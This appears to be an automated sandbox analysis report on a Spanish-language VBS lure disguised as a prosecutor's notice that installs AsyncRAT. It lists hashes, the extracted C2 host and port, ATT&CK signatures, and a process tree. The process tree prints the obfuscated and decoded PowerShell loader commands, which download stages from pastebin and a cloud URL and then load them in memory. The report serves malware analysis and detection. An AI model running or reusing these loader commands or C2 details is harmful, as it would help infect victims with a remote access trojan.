Analysis
-
max time kernel
152s -
max time network
180s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
31-10-2024 20:00
General
-
Target
LEER NOTIFICACION N-00474706 FISCALIA GENERAL DE LA NACION.vbs
-
Size
28.3MB
-
MD5
5f0d3141a31581c672a26ed55daf951e
-
SHA1
7aa56e653b5305c077a9c71e357c550dc79dd4f4
-
SHA256
d9ea362e4c21df8703a0904c36caf3d92969bda9566ae4d6885471e385aa8514
-
SHA512
a548f1224bd27ef4f89f0e35dc2053aa63351efce6e5547d1294a62b4e5b7716ee510785f606ed6cc6bbd92c71594644cfe22270fda0c0b6444b9ddd82186949
-
SSDEEP
768:P++++++++++++++++++e++++++++++++++++++J++++++++++++++++++e+++++Z:UZkcpv+bcoI
Malware Config
Extracted
https://pastebin.com/raw/J6uRjZrv
Extracted
asyncrat
1.0.7
Default
trabajo25.duckdns.org:4000
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Blocklisted process makes network request 5 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LEER NOTIFICACION N-00474706 FISCALIA GENERAL DE LA NACION.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹Sg☹2☹HU☹UgBq☹Fo☹cgB2☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bu☹Gs☹a☹Bh☹HY☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹bwBw☹GE☹ZwBz☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹HM☹cQB1☹Gk☹c☹☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹cwBx☹HU☹aQBw☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹JwBu☹Gk☹bQBk☹GE☹PQBl☹GQ☹bwBt☹CY☹MQBm☹GU☹MwBk☹DY☹M☹☹2☹GM☹M☹☹w☹D☹☹MQ☹2☹D☹☹O☹☹x☹Dk☹Ng☹2☹D0☹d☹Bj☹GU☹agBv☹HI☹c☹☹m☹DE☹ZgBl☹DM☹Z☹☹2☹D☹☹NgBj☹D☹☹M☹☹w☹DE☹Ng☹w☹Dg☹MQ☹5☹DY☹Ng☹9☹HQ☹YwBl☹Go☹bwBy☹H☹☹PwB3☹GU☹aQB2☹C8☹OQ☹4☹GY☹Mw☹5☹GE☹ZQ☹2☹DE☹M☹☹w☹D☹☹OQBl☹D☹☹M☹Bh☹GQ☹Ng☹2☹C8☹cwBl☹Gw☹aQBm☹C8☹Yg☹z☹DI☹NwBk☹DY☹Yg☹w☹DQ☹MQ☹w☹D☹☹MQ☹5☹DE☹O☹☹x☹Dk☹Ng☹2☹C8☹cwB0☹GU☹awBj☹HU☹Yg☹v☹GU☹ZwBh☹HI☹bwB0☹HM☹Lw☹x☹HY☹LwBv☹Gk☹LgBl☹HQ☹aQBy☹Hc☹c☹Bw☹GE☹LgBk☹HU☹bwBs☹GM☹Lw☹v☹Do☹cwBw☹HQ☹d☹Bo☹Cc☹I☹☹s☹C☹☹J☹Bv☹H☹☹YQBn☹HM☹I☹☹s☹C☹☹Jw☹z☹DI☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹C0☹LQ☹t☹C0☹LQ☹t☹C0☹Jw☹s☹C☹☹J☹Bu☹Gs☹a☹Bh☹HY☹L☹☹g☹Cc☹MQ☹n☹Cw☹I☹☹n☹FI☹bwBk☹GE☹Jw☹g☹Ck☹KQ☹7☹☹==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\LEER NOTIFICACION N-00474706 FISCALIA GENERAL DE LA NACION.vbs');powershell $Yolopolhggobek;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$nkhav = '0' ;$opags = 'C:\Users\Admin\AppData\Local\Temp\LEER NOTIFICACION N-00474706 FISCALIA GENERAL DE LA NACION.vbs' ;[Byte[]] $squip = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($squip).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('nimda=edom&1fe3d606c00016081966=tcejorp&1fe3d606c00016081966=tcejorp?weiv/98f39ae610009e00ad66/selif/b327d6b0410019181966/stekcub/egarots/1v/oi.etirwppa.duolc//:sptth' , $opags , '32___________________________________-------', $nkhav, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c4⤵
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize
1KB
MD55c9d2cbff87039dfa98390f51b06f61b
SHA1736a64968f091a0fc9b987a45faf66f5f0bf6cd4
SHA256b3ff6eac7e6d3f70f21d63f5a34e04322d71319e27bb433f4496663337bf3251
SHA51243831a52799e14bee975a825342ffb51003e12597b664e18918b690f5f8781ab92f7f63428ee29aad05a3c386af5604e0cd0ca8df228b676a9da047fed51a3dd
-
Filesize
64B
MD5feadc4e1a70c13480ef147aca0c47bc0
SHA1d7a5084c93842a290b24dacec0cd3904c2266819
SHA2565b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
69B
MD55c28f82f614a6673937d5c1da9d80a37
SHA1b447e5687c3d5d264f2192566a5d01babcc061a1
SHA256ede1395c29bcf17abaf921ab45f814ec21bb76285cc94836772c5474da24b861
SHA5129bd602b93f185a6d150f0976dd495798fd2e45af7c263a1d0a3181c96f5d851e391db363494703ad81c78eaaacb59f86832135c37c7c859e7e8b65f6e115d353
-
Filesize
103KB
MD5128e1fa5360ccb1bf503fb0afbe99d82
SHA108f1b78486201b40d2bb1d866389e097cfcfd785
SHA25602d0afdfe0f23ad2189bb057115b9265115739de6fd6429256875107931fa4e5
SHA5125dc44cb4bb58f468e13b8590df67a9ab1ce94e3a2003a18e3472be979ce752fd315cd43d44ac24e025ee3b72f469467f1128f60b041e5e7128d13b563bae3b2d
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
72KB
-
Filesize
624KB
-
Filesize
5.6MB
-
Filesize
408KB
-
Filesize
88KB
-
Filesize
88KB